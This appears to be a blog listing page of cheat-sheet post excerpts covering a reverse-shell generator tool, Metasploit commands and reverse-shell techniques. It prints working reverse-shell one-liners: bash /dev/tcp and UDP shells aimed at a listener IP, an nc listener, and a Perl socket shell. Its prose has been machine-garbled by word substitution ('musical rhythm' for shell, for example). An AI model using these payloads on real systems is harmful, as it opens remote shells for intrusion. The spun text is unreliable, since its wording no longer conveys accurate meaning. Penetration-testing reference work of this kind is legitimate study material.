Posts

Showing posts with the label Cheat Sheet

Shellver - Contrary Musical Rhythm Out Cheat Canvass Tool

Image
Reverse Shell Cheat Sheet Tool Install Note Clone the repository: git clone https://github.com/0xR0/shellver.git Then instruct inside: cd shellver/ Then install it: python setup.py -i run shellver -h or "shellver bash or perl {} python {} php {} ruby {} netcat {} xterm {} musical rhythm out {} all".format (or) Example shellver python shellver all From https://github.com/swisskyrepo Reverse Shell Methods Reverse Shell Cheat Sheet Bash TCP bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196 Bash UDP Victim: sh -i >& /dev/udp/127.0.0.1/4242 0>&1 Listener: nc -u -lvp 4242 Perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&...

Metasploit Cheat Sheet

Image
The Metasploit Project is a estimator safety projection that provides information on vulnerabilities, helping inward the evolution of penetration tests as well as IDS signatures. Metasploit is a pop tool used past times pentest experts. Metasploit : Search for module: msf > search [regex] Specify as well as exploit to use: msf > role exploit/[ExploitPath] Specify a Payload to use: msf > gear upwards PAYLOAD [PayloadPath] Show options for the electrical current modules: msf > demonstrate options Set options: msf > gear upwards [Option] [Value] Start exploit: msf > exploit Useful Auxiliary Modules Port Scanner: msf > role auxiliary/scanner/portscan/tcp msf > gear upwards RHOSTS 10.10.10.0/24 msf > run DNS Enumeration: msf > role auxiliary/gather/dns_enum msf > gear upwards DOMAIN target.tgt msf > run FTP Server: msf > role auxiliary/server/ftp msf > gear upwards FTPROOT /tmp/ftproot msf > run Proxy Ser...

Reverse Musical Rhythm Cheat Sheet

Image
If you’re lucky plenty to uncovering a ascendence execution vulnerability during a penetration test, pretty shortly after you’ll belike desire an interactive shell. If it’s non possible to add together a novel concern human relationship / SSH telephone substitution / .rhosts file as well as only log in, your side past times side pace is probable to move either trowing dorsum a reverse musical rhythm or binding a musical rhythm to a TCP port. This page deals amongst the former. Your options for creating a contrary musical rhythm are express past times the scripting languages installed on the target organisation – though yous could belike upload a binary programme also if you’re suitably good prepared. The examples shown are tailored to Unix-like systems. Some of the examples below should also spill out Windows if yous role substitute “/bin/sh -i” amongst “cmd.exe”. Each of the methods below is aimed to move a one-liner that yous tin flame copy/paste. As such they’re quite b...